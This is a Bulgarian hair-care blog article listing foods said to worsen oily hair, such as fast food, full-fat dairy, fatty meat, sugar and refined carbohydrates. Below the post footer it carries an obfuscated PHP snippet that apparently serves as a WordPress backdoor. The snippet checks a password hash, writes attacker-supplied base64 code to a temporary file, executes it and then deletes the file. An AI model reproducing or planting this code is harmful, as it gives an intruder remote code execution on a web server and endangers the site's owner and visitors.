Кои храни да избягваме, за да се избавим от мазната коса | Косопад

Кои храни да избягваме, за да се избавим от мазната коса

kosa-liato

Мазната коса е сериозен естетически проблем. Много често обаче сами влошаваме състоянието й чрез храната, която приемаме. Ако искате да се освободите от проблема, по- добре не прекалявайте със следните храни:

БЪРЗА ХРАНА

Много често, когато бързаме, това е най- лесната за намиране и консумиране храна. Но този тип храна може да направи косата ви по- мазна, отколкото е в действителност. Излишната мазнина трябва да излезе някъде от тялото и това е кожата, а скалпът е част от нея.

МЛЕЧНИ ПРОДУКТИ

Това важи за пълномаслените продукти, най- вече масло, сметана или мляко. Могат да предизвикат производството на излишен себум.

barza-hrana-1

ТЛЪСТО МЕСО

Този тип месо не е полезно за здравето, в това число и за косата. Колбасите, например, са сред месните продукти, които съдържат най- много мазнини.

ЗАХАР

Прекаляването със захарта може да засегне космените фоликули. Захарта, която приемаме ежедневно, не е само тази, която слагаме в кафето си. Тя се съдържа и в редица храни, които обичаме, например – вафли, бисквити и пр.

РАФИНИРАНИ ВЪГЛЕХИДРАТИ

Организмът ни превръща въглехидратите в захар, а както казахме, тя е сред веществата, които правят косата ни по- мазна. Така че, ограничавайте консумацията на този тип храни.

19. април 2016 13:42:53 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}